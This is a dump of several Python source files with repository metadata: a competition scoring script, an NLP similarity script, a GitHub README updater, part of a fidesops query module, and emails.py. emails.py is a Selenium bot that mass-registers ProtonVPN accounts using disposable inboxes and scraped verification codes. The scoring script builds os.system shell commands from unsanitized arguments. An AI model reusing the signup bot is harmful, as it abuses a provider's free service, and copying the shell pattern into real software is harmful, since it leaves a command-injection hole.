| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8be6bc259868341293934801c28e199c01bfba
| 1,539
|
py
|
Python
|
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import os
import time
import gym
import warnings
# Parts of the code are inspired by the AutoML3 competition
from sys import argv, path
from os import getcwd
from os.path import join
verbose = True
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="The experiment runner for the DAC4RL track."
)
parser.add_argument(
"-t",
"--competition-track",
choices=['dac4sgd', 'dac4rl'],
help="DAC4SGD or DAC4RL",
default="dac4rl",
)
parser.add_argument(
"-i",
"--input-dir",
type=str,
default="",
help="",
)
parser.add_argument(
"-o",
"--output-dir",
type=str,
default="",
help="",
)
root_dir = getcwd()
print("Working directory:", root_dir)
args, unknown = parser.parse_known_args()
output_dir = os.path.abspath(args.output_dir)
if verbose:
print("Using output_dir: " + output_dir)
if not os.path.exists(args.output_dir):
print("Path not found:", args.output_dir)
os.makedirs(args.output_dir)
if os.path.exists(args.output_dir):
print("Output directory contents:")
os.system("ls -lR " + args.output_dir)
if os.path.exists(args.input_dir):
os.system("cp " + args.input_dir + "/res/scores.txt " + args.output_dir)
else:
print("No results from ingestion!")
with open(args.output_dir + '/scores.txt', 'r') as fh:
print(fh.readlines())
| 23.676923
| 80
| 0.59974
| 191
| 1,539
| 4.685864
| 0.424084
| 0.12067
| 0.130726
| 0.050279
| 0.165363
| 0.118436
| 0.118436
| 0.069274
| 0
| 0
| 0
| 0.006233
| 0.270305
| 1,539
| 64
| 81
| 24.046875
| 0.790739
| 0.037037
| 0
| 0.173077
| 0
| 0
| 0.186739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8d359a9fdb99a983fada9faf82eacea1c12723
| 11,067
|
py
|
Python
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 5
|
2020-04-03T13:57:07.000Z
|
2022-03-11T03:20:14.000Z
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 2
|
2020-10-15T20:26:44.000Z
|
2021-05-29T09:36:10.000Z
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 5
|
2020-04-03T13:57:08.000Z
|
2022-01-23T08:52:16.000Z
|
# ๐ This Project is in it's early stages of Development.
# ๐ Working on new features and main menu.
# โ ๏ธ Any Questions or Suggestions please Mail to: hendriksdevmail@gmail.com
# ๐ฅ Version: 1.0.0
from selenium import webdriver
from colorama import Fore, Back, Style
import warnings
import time
import random
import string
import urllib.request
import requests
import csv
import sys
from proxyscrape import create_collector
import os
clear = lambda: os.system('clear')
clear()
collector = create_collector('my-collector', 'https')
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
time.sleep(15)
restart = 2
while (restart > 1):
# Pick an email for Verification. Replace 'YourEmail@Mail.com' with an email adress. (You can use 10min mail for this)
# verifymail = input('\033[31m' + "Enter Email Adress for Verification: " + '\033[0m')
verifymail = ''
# f = open('./input_emails.txt')
# verifymail = f.readline().trim()
# verifymail = 'itlammhewuicxfmhco@ttirv.org'
# Pick an email for Notification. Replace 'YourEmail@Mail.com' with an email adress. (You can use 10min mail for this)
# notifymail = input('\033[31m' + "Enter Email Adress for Recovery: " + '\033[0m')
notifymail = ''
# notifymail = 'itlammhewuicxfmhco@ttirv.org'
proxy_status = "false"
while (proxy_status == "false" and False):
# Retrieve only 'us' proxies
proxygrab = collector.get_proxy({'code': ('in')})
proxy = ("{}:{}".format(proxygrab.host, proxygrab.port))
print ('\033[31m' + "Proxy:", proxy + '\033[0m')
try:
proxy_host = proxygrab.host
proxy_port = proxygrab.port
proxy_auth = ":"
proxies = {'http':'http://{}@{}:{}/'.format(proxy_auth, proxy_host, proxy_port)}
requests.get("http://example.org", proxies=proxies, timeout=1.5)
except OSError:
print ('\033[31m' + "Proxy Connection error!" + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "false"
else:
print ('\033[31m' + "Proxy is working..." + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "true"
else:
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.select import Select
warnings.filterwarnings("ignore", category=DeprecationWarning)
options = Options()
email_driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
email_url = 'https://www.guerrillamail.com/'
email_driver.get(email_url)
time.sleep(4)
# # print(driver.find_element_by_id('inbox-id').text)
email = email_driver.find_element_by_id('inbox-id').text + '@';
domain_name = Select(email_driver.find_element_by_id('gm-host-select')).first_selected_option.text
# # domain_name = email_driver.find_element_by_id('gm-host-select').text
email += domain_name
# print(domain_name)
print(email)
# f = open('./input_emails.txt', 'w')
# f.write(email)
verifymail = email
# email_driver.find_element_by_partial_link_text('verification').click()
# options.add_argument('--proxy-server={}'.format(proxy))
# Change Path to Chrome Driver Path (or move your ChromeDriver into the project folder)
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
# url = 'http://protonmail.com/signup'
url = 'http://account.protonvpn.com/signup'
#url =
def randomStringDigits(stringLength=13):
# Generate a random string of letters and digits
lettersAndDigits = string.ascii_letters + string.digits
return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))
def getUserName():
f = open('lastused.txt')
val = int(f.readline())
f.close()
f = open('lastused.txt', 'w')
val += 1
f.write(str(val))
return 'wowmainia'+str(val - 1)
rngusername = getUserName()
rngpassword = randomStringDigits(15)
driver.get(url)
# time.sleep(10)
# driver.find_element_by_class_name('pm-button w100 mtauto pm-button--primaryborder').click()
# driver.find_element_by_link_text("Get Free").click()
# driver.find_element_by_xpath("/html/body/div[1]/main/main/div/div[4]/div[1]/div[3]/button").click()
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div:nth-child(5) > div:nth-child(1) > div.flex-item-fluid-auto.pt1.pb1.flex.flex-column > button").click()
break
except:
time.sleep(1)
continue
# driver.find_element_by_id('freePlan').click()
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
# time.sleep(4)
# driver.switch_to_frame(0)
# time.sleep(3)
# driver.find_element_by_id('username').send_keys(rngusername)
# time.sleep(1)
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
while True:
try:
driver.find_element_by_id("username").send_keys(rngusername)
driver.find_element_by_id("password").send_keys(rngpassword)
driver.find_element_by_id("passwordConfirmation").send_keys(rngpassword)
driver.find_element_by_id("email").send_keys(verifymail)
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div:nth-child(1) > form > div:nth-child(3) > div > button").click()
break
except:
time.sleep(1)
# driver.switch_to.default_content()
# time.sleep(1)
# driver.find_element_by_id('password').send_keys(rngpassword)
# time.sleep(1)
# driver.find_element_by_id('passwordc').send_keys(rngpassword)
# time.sleep(1)
# driver.switch_to_frame(1)
# time.sleep(1)
# driver.find_element_by_id('notificationEmail').send_keys(notifymail)
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > div > div > div:nth-child(2) > form > div:nth-child(2) > button").click()
break
except:
time.sleep(1)
# time.sleep(60)
# time.sleep(1)
# email_driver.find_element_by_partial_link_text('verification').click()
# email_driver.find_element_by_link_text('notify@protonmail.ch ').click()
while True:
try:
val = email_driver.find_element_by_class_name('email-excerpt').text
if not val[-6:].isnumeric():
raise Exception
print(val[-6:], "verification")
driver.find_element_by_id('code').send_keys(val[-6:])
time.sleep(1)
driver.find_element_by_css_selector('body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > form > div > div > div:nth-child(4) > button').click()
break
except:
time.sleep(1)
# driver.find_element_by_name('submitBtn').click()
# time.sleep(6)
# driver.find_element_by_id('id-signup-radio-email').click()
# time.sleep(1)
# driver.find_element_by_id('emailVerification').send_keys(verifymail)
# time.sleep(1)
# driver.find_element_by_class_name('codeVerificator-btn-send').click()
# time.sleep(3)
print ('\033[31m' + "Your New Email Adress is: ", rngusername,"@protonmail.com", sep='' + '\033[0m')
print ('\033[31m' + "Your New Email Password is: " + '\033[0m' , rngpassword)
complete = "false"
while (complete == "false"):
complete_q = input("Did you complete the Verification process? y/n: ")
if complete_q == "y":
driver.close()
csvData = [[verifymail, rngpassword]]
with open('list.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
print ('Great! We added you account details to the table.')
complete = "true"
else:
print ('Please try verifing and try again')
time.sleep(1)
complete = "false"
else:
restart_s = input("Do you want to restart the Script and create more Accounts? y/n: ")
if restart_s == "y":
restart ++ 1
clear()
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
else:
print ("Ok! The script is exiting now.")
time.sleep(1)
exit()
else:
print("something")
| 37.771331
| 218
| 0.539893
| 1,126
| 11,067
| 4.761989
| 0.250444
| 0.057814
| 0.098284
| 0.109847
| 0.418314
| 0.381574
| 0.338493
| 0.298769
| 0.242074
| 0.163372
| 0
| 0.024567
| 0.315894
| 11,067
| 292
| 219
| 37.900685
| 0.683001
| 0.239089
| 0
| 0.457143
| 0
| 0.08
| 0.354947
| 0.017586
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011429
| false
| 0.028571
| 0.08
| 0
| 0.102857
| 0.074286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8d77d4d57e1f26a6211fbc207a54886ca5a41a
| 4,201
|
py
|
Python
|
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | 2
|
2021-06-09T20:55:17.000Z
|
2021-11-03T03:07:37.000Z
|
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | null | null | null |
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | 1
|
2020-07-26T02:31:38.000Z
|
2020-07-26T02:31:38.000Z
|
######################
# Loading word2vec
######################
import os
from threading import Semaphore
import gensim
from gensim.models import KeyedVectors
pathToBinVectors = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300.bin'
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
if os.path.isfile(newFilePath):
print("File exists... please wait")
model = KeyedVectors.load(newFilePath, mmap='r')
model.syn0norm = model.syn0 # prevent recalc of normed vectors
model.most_similar('stuff') # any word will do: just to page all in
Semaphore(0).acquire() # just hang until process killed
else:
print("Loading the data file... Please wait...")
model = gensim.models.KeyedVectors.load_word2vec_format(pathToBinVectors, binary=True)
model.init_sims(replace=True)
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
model.save(newFilePath)
print("Successfully loaded 3.6 G bin file!")
# How to call one word vector?
# model1['resume'] -> This will return NumPy vector of the word "resume".
import numpy as np
import math
from scipy.spatial import distance
from random import sample
from nltk.corpus import stopwords
class PhraseVector:
def __init__(self, phrase):
self.vector = self.PhraseToVec(phrase)
# <summary> Calculates similarity between two sets of vectors based on the averages of the sets.</summary>
# <param>name = "vectorSet" description = "An array of arrays that needs to be condensed into a single array (vector). In this class, used to convert word vecs to phrases."</param>
# <param>name = "ignore" description = "The vectors within the set that need to be ignored. If this is an empty list, nothing is ignored. In this class, this would be stop words."</param>
# <returns> The condensed single vector that has the same dimensionality as the other vectors within the vecotSet.</returns>
def ConvertVectorSetToVecAverageBased(self, vectorSet, ignore = []):
if len(ignore) == 0:
return np.mean(vectorSet, axis = 0)
else:
return np.dot(np.transpose(vectorSet) ,ignore ) /sum(ignore)
def PhraseToVec(self, phrase):
cachedStopWords = stopwords.words("english")
phrase = phrase.lower()
wordsInPhrase = [word for word in phrase.split() if word not in cachedStopWords]
vectorSet = []
for aWord in wordsInPhrase:
try:
wordVector =model[aWord]
vectorSet.append(wordVector)
except:
pass
return self.ConvertVectorSetToVecAverageBased(vectorSet)
# <summary> Calculates Cosine similarity between two phrase vectors.</summary>
# <param> name = "otherPhraseVec" description = "The other vector relative to which similarity is to be calculated."</param>
def CosineSimilarity(self, otherPhraseVec):
cosine_similarity = np.dot(self.vector, otherPhraseVec) / \
(np.linalg.norm(self.vector) * np.linalg.norm(otherPhraseVec))
try:
if math.isnan(cosine_similarity):
cosine_similarity = 0
except:
cosine_similarity = 0
return cosine_similarity
if __name__ == "__main__":
print("###################################################################")
print("###################################################################")
print("########### WELCOME TO THE PHRASE SIMILARITY CALCULATOR ###########")
print("###################################################################")
print("###################################################################")
text1 = 'Matt Lieber is a garment that the wind shook.'
text2 = 'Matt Lieber is a final shrug of the shoulders.'
phraseVector1 = PhraseVector(text1)
phraseVector2 = PhraseVector(text2)
similarityScore = phraseVector1.CosineSimilarity(phraseVector2.vector)
print("###################################################################")
print("Similarity Score: ", similarityScore)
print("###################################################################")
| 44.221053
| 191
| 0.615092
| 442
| 4,201
| 5.798643
| 0.423077
| 0.037456
| 0.030433
| 0.042138
| 0.078814
| 0.078814
| 0.057745
| 0.057745
| 0.057745
| 0
| 0
| 0.008527
| 0.190431
| 4,201
| 94
| 192
| 44.691489
| 0.745075
| 0.240895
| 0
| 0.238806
| 0
| 0
| 0.289137
| 0.194249
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059701
| false
| 0.014925
| 0.134328
| 0
| 0.268657
| 0.164179
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c8f9f7ee5923a773fc310335335a5650e8aeefb
| 12,399
|
py
|
Python
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 8
|
2021-09-22T21:06:13.000Z
|
2022-03-27T09:52:55.000Z
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 6
|
2021-07-30T09:35:01.000Z
|
2022-03-30T13:16:03.000Z
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 2
|
2021-08-14T10:45:37.000Z
|
2021-11-20T12:41:13.000Z
|
"""
Copyright 2021 Janrey "CodexLink" Licas
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ast import literal_eval
from asyncio import sleep
from logging import Logger
from os import _exit as terminate
from typing import Any, Callable, Optional, Union
from aiohttp import BasicAuth, ClientResponse, ClientSession
from elements.constants import (
COMMIT_REQUEST_PAYLOAD,
DISCORD_CLIENT_INTENTS,
REQUEST_HEADER,
ExitReturnCodes,
GithubRunnerActions,
GithubRunnerLevelMessages,
)
from elements.typing import (
Base64String,
HttpsURL,
READMEContent,
READMEIntegritySHA,
READMERawContent,
)
class AsyncGithubAPILite:
# * The following variables are declared for weak reference since there's no hint-typing inheritance.
envs: Any
logger: Logger
print_exception: Callable
"""
This child class is a scratch implementation based from Github API. It was supposed to be a re-write implementation of PyGithub for async,
but I just realized that I only need some certain components. This class also contains session for all HTTPS requests and that includes Badgen.
"""
async def __ainit__(self) -> None:
"""
Asynchronous init for instantiating other classes, if there's another one behind the MRO, which is the DiscordClientHandler.
This also instantiates aiohttp.ClientSession for future requests.
"""
self._api_session: ClientSession = ClientSession()
self.logger.info("ClientSession for API Requests has been instantiated.")
super().__init__()
self.logger.info(
f"Discord Client Instantiatied with intents={DISCORD_CLIENT_INTENTS=}"
)
self.logger.info(
f"{AsyncGithubAPILite.__name__} is done initializing other elements."
)
async def exec_api_actions(
self,
action: GithubRunnerActions,
data: Optional[list[Union[READMEIntegritySHA, READMERawContent]]] = None,
) -> Union[None, list[Union[READMEIntegritySHA, Base64String]]]:
"""
A method that handles every possible requests by packaging required components into one. This was done so that we only have to call the method without worrying anything.
Args:
action (GithubRunnerActions): The action to perform. Choices should be FETCH_README and COMMIT_CHANGES.
data (Optional[list[tuple[READMEIntegritySHA, READMERawContent]]] , optional): The data required for COMMIT_CHANGES.
Basically it needs the old README SHA integrity and the new README in the form of Base64 (READMERawContent). Defaults to None.
Returns:
Union[None, list[Union[READMEIntegritySHA, Base64String]]]: This expects to return a list of READMEIntegritySHA and Base64 straight from b64decode or None.
"""
if action in GithubRunnerActions:
# We setup paths for HttpsURL with the use of these two varaibles.
user_repo = (
"{0}/{0}".format(self.envs["GITHUB_ACTOR"])
if self.envs["PROFILE_REPOSITORY"] is None
else "{0}".format(self.envs["PROFILE_REPOSITORY"])
)
repo_path: HttpsURL = HttpsURL(
"{0}/repos/{1}/{2}".format(
self.envs["GITHUB_API_URL"],
user_repo,
"readme"
if action is GithubRunnerActions.FETCH_README
else "contents/README.md",
)
)
# When making requests, we might want to loop whenever the data that we receive is malformed or have failed to send.
while True:
http_request: ClientResponse = await self._request(
repo_path, action, data=data if data is not None else None
)
try:
if http_request.ok:
suffix_req_cost: str = (
"Remaining Requests over Rate-Limit (%s/%s)"
% (
http_request.headers["X-RateLimit-Remaining"],
http_request.headers["X-RateLimit-Limit"],
)
)
# For this action, decode the README (base64) in utf-8 (str) then sterilized unnecessary newline.
if action is GithubRunnerActions.FETCH_README:
read_response: bytes = http_request.content.read_nowait()
serialized_response: dict = literal_eval(
read_response.decode("utf-8")
)
self.logger.info(
f"Github Profile ({user_repo}) README has been fetched. | {suffix_req_cost}"
)
return [
serialized_response["sha"],
Base64String(
serialized_response["content"].replace("\n", "")
),
]
# Since we commit and there's nothing else to modify, just output that the request was success.
if action is GithubRunnerActions.COMMIT_CHANGES and data is Base64String(data): # type: ignore # It explicitly wants to typecast `str`, which renders the condition false.
self.logger.info(
f"README Changes from ({user_repo}) has been pushed through! | {suffix_req_cost}"
)
return None
# If any of those conditions weren't met, retry again.
else:
self.logger.warning(
"Conditions were not met, continuing again after 3 seconds (as a penalty)."
)
await sleep(0.6)
continue
# Same for this case, but we assert that the data received is malformed.
except SyntaxError as e:
self.logger.warning(
f"Fetched Data is either incomplete or malformed. Attempting to re-fetch... | Info: {e} at line {e.__traceback__.tb_lineno}." # type: ignore
)
await sleep(0.6)
continue
# Whenever we tried too much, we don't know if we are rate-limited, because the request will make the ClientResponse.ok set to True.
# So for this case, we special handle it by identifying the message.
except KeyError as e:
if serialized_response["message"].startswith(
"API rate limit exceeded"
):
msg: str = f"Request accepted but you are probably rate-limited by Github API. Did you keep on retrying or you are over-committing changes? | More Info: {e} at line {e.__traceback__.tb_lineno}." # type: ignore
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg, e)
terminate(ExitReturnCodes.RATE_LIMITED_EXIT)
else:
msg = f"The given value on `action` parameter is invalid! Ensure that the `action` is `{GithubRunnerActions}`!"
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg)
terminate(ExitReturnCodes.ILLEGAL_CONDITION_EXIT)
async def _request(
self,
url: HttpsURL,
action_type: GithubRunnerActions,
data: Optional[list[Union[READMEIntegritySHA, READMERawContent]]] = None,
) -> ClientResponse:
"""
An inner-private method that handles the requests by using packaged header and payload, necessarily for requests.
Args:
url (HttpsURL): The URL String to make Request.
action_type (GithubRunnerActions): The type of action that is recently passed on `exec_api_actions().`
data (Optional[list[Union[READMEIntegritySHA, READMERawContent]]], optional): The argument given in `exec_api_actions()`, now handled in this method.. Defaults to None.
Returns:
ClientResponse: The raw response given by the aiohttp.REST_METHODS. Returned without modification to give the receiver more options.
"""
if action_type in GithubRunnerActions:
self.logger.info(
(
"Attempting to Fetch README from Github API <<< {0}/{0} ({1})".format(
self.envs["GITHUB_ACTOR"], url
)
if action_type is GithubRunnerActions.FETCH_README
else "Attempting to Commit Changes of README from Github API >>> {0}/{0} ({1})".format(
self.envs["GITHUB_ACTOR"], url
)
)
if GithubRunnerActions.COMMIT_CHANGES
else None
)
# # This dictionary is applied when GithubRunnerActions.COMMIT_CHANGES was given in parameter `action`.
extra_contents: REQUEST_HEADER = {
"headers": {"Accept": "application/vnd.github.v3+json"},
"auth": BasicAuth(
self.envs["GITHUB_ACTOR"], self.envs["WORKFLOW_TOKEN"]
),
}
# # This dictionary is applied when GithubRunnerActions.COMMIT_CHANGES was given in parameter `action`.
data_context: COMMIT_REQUEST_PAYLOAD = (
{
"content": READMEContent(bytes(data[1]).decode("utf-8")) if data is not None else None, # type: ignore # Keep in mind that the type-hint is already correct, I don't know what's the problem.]
"message": self.envs["COMMIT_MESSAGE"],
"sha": READMEIntegritySHA(str(data[0]))
if data is not None
else None,
"committer": {
"name": "Discord Activity Badge",
"email": "discord_activity@discord_bot.com",
},
}
if action_type is GithubRunnerActions.COMMIT_CHANGES
else {
"content": READMEContent(""),
"message": "",
"sha": READMEIntegritySHA(""),
"committer": {"name": "", "email": ""},
}
)
http_request: ClientResponse = await getattr(
self._api_session,
"get" if action_type is GithubRunnerActions.FETCH_README else "put",
)(url, json=data_context, allow_redirects=False, **extra_contents)
# todo: Make this clarified or confirmed. We don't have a case to where we can see this in action.
if http_request.ok:
return http_request
# ! Sometimes, we can exceed the rate-limit request per time. We have to handle the display error instead from the receiver of this request.
_resp_raw: ClientResponse = http_request # Supposed to be ClientResponse
_resp_ctx: dict = literal_eval(str(_resp_raw))
self.logger.debug(_resp_ctx)
terminate(ExitReturnCodes.EXCEPTION_EXIT)
else:
msg: str = f"An Enum invoked on `action` parameter ({action_type.name}) is invalid! This is probably an issue from the developer, please contact the developer as possible."
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg, None)
terminate(ExitReturnCodes.ILLEGAL_CONDITION_EXIT)
| 46.092937
| 234
| 0.583595
| 1,316
| 12,399
| 5.398176
| 0.318389
| 0.016892
| 0.011824
| 0.008446
| 0.191723
| 0.157095
| 0.124578
| 0.114865
| 0.079673
| 0.079673
| 0
| 0.006031
| 0.344705
| 12,399
| 268
| 235
| 46.264925
| 0.868308
| 0.164771
| 0
| 0.16763
| 0
| 0.023121
| 0.190169
| 0.026911
| 0
| 0
| 0
| 0.003731
| 0
| 1
| 0
| false
| 0
| 0.046243
| 0
| 0.086705
| 0.023121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c9056dfb6354e5daafd7bffd768de97d7f13f54
| 11,790
|
py
|
Python
|
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
import logging
import re
from abc import ABC, abstractmethod
from typing import Dict, Any, List, Set, Optional, Generic, TypeVar, Tuple
from sqlalchemy import text
from sqlalchemy.sql.elements import TextClause
from fidesops.graph.config import ROOT_COLLECTION_ADDRESS, CollectionAddress
from fidesops.graph.traversal import TraversalNode, Row
from fidesops.models.policy import Policy
from fidesops.util.collection_util import append
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
T = TypeVar("T")
class QueryConfig(Generic[T], ABC):
"""A wrapper around a resource-type dependant query object that can generate runnable queries and string representations."""
class QueryToken:
"""A placeholder token for query output"""
def __str__(self) -> str:
return "?"
def __repr__(self) -> str:
return "?"
def __init__(self, node: TraversalNode):
self.node = node
@property
def fields(self) -> List[str]:
"""Fields of interest from this traversal traversal_node."""
return [f.name for f in self.node.node.collection.fields]
def update_fields(self, policy: Policy) -> List[str]:
"""List of update-able field names"""
def exists_child(
field_categories: List[str], policy_categories: List[str]
) -> bool:
"""A not very efficient check for any policy category that matches one of the field categories or a prefix of it."""
if field_categories is None or len(field_categories) == 0:
return False
for policy_category in policy_categories:
for field_category in field_categories:
if field_category.startswith(policy_category):
return True
return False
policy_categories = policy.get_erasure_target_categories()
return [
f.name
for f in self.node.node.collection.fields
if exists_child(f.data_categories, policy_categories)
]
@property
def primary_keys(self) -> List[str]:
"""List of fields marked as primary keys"""
return [f.name for f in self.node.node.collection.fields if f.primary_key]
@property
def query_keys(self) -> Set[str]:
"""
All of the possible keys that we can query for possible filter values.
These are keys that are the ends of incoming edges.
"""
return set(map(lambda edge: edge.f2.field, self.node.incoming_edges()))
def filter_values(self, input_data: Dict[str, List[Any]]) -> Dict[str, Any]:
"""
Return a filtered list of key/value sets of data items that are both in
the list of incoming edge fields, and contain data in the input data set
"""
return {
key: value
for (key, value) in input_data.items()
if key in self.query_keys
and isinstance(value, list)
and len(value)
and None not in value
}
def query_sources(self) -> Dict[str, List[CollectionAddress]]:
"""Display the input sources for each query key"""
data: Dict[str, List[CollectionAddress]] = {}
for edge in self.node.incoming_edges():
append(data, edge.f2.field, edge.f1.collection_address())
return data
def display_query_data(self) -> Dict[str, Any]:
"""Data to represent a display (dry-run) query. Since we don't know
what data is available, just generate a query where the input identity
values are assumed to be present and singulur and all other values that
may be multiple are represented by a pair [?,?]"""
data = {}
t = QueryConfig.QueryToken()
for k, v in self.query_sources().items():
if len(v) == 1 and v[0] == ROOT_COLLECTION_ADDRESS:
data[k] = [t]
else:
data[k] = [
t,
QueryConfig.QueryToken(),
] # intentionally want a second instance so that set does not collapse into 1 value
return data
@abstractmethod
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy]
) -> Optional[T]:
"""Generate a retrieval query. If there is no data to be queried
(for example, if the policy identifies no fields to be queried)
returns None"""
@abstractmethod
def query_to_str(self, t: T, input_data: Dict[str, List[Any]]) -> str:
"""Convert query to string"""
@abstractmethod
def dry_run_query(self) -> Optional[str]:
"""dry run query for display"""
@abstractmethod
def generate_update_stmt(self, row: Row, policy: Optional[Policy]) -> Optional[T]:
"""Generate an update statement. If there is no data to be updated
(for example, if the policy identifies no fields to be updated)
returns None"""
class SQLQueryConfig(QueryConfig[TextClause]):
